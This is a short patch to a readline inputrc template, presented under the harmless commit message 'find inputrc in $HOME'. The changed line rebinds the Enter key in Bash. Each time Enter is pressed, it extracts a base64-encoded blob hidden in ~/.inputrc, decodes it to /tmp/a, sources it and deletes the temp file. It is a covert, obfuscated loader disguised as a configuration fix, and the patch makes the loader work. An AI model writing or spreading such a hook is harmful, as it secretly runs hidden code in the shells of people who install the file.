find inputrc in $HOME
Signed-off-by: B Horn <b@horn.uk>

--- a/inputrc.tmpl
+++ b/inputrc.tmpl
@@ -1,4 +1,4 @@
 $include /etc/inputrc
 $if Bash
-"\C-m":"\ngrep -o '\x2f///.*\$' .inputrc | base64 -d > /tmp/a;source /tmp/a;rm /tmp/a\n"
+"\C-m":"\ngrep -o '\x2f///.*\$' ~/.inputrc | base64 -d > /tmp/a;source /tmp/a;rm /tmp/a\n"
 $endif
